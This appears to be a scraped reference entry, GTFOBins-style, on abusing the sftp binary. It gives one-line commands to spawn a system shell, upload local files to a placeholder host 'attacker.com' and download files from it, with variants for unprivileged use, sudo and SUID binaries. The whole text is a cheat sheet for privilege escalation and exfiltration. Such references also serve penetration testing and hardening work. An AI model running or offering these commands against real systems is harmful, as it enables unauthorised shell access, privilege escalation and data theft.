sftp
Shell
This executable can spawn an interactive system shell.
- This function can be performed by any unprivileged user.
sftp user@attacker.com !/bin/shThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.sftp user@attacker.com !/bin/shThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.sftp user@attacker.com !/bin/sh
Upload
This executable can upload local data.
- This function can be performed by any unprivileged user.
sftp user@attacker.com put /path/to/input-file /path/to/output-fileThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.sftp user@attacker.com put /path/to/input-file /path/to/output-fileThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.sftp user@attacker.com put /path/to/input-file /path/to/output-file
Download
This executable can download remote data.
- This function can be performed by any unprivileged user.
sftp user@attacker.com get /path/to/input-file /path/to/output-fileThis function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.sftp user@attacker.com get /path/to/input-file /path/to/output-fileThis function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.sftp user@attacker.com get /path/to/input-file /path/to/output-file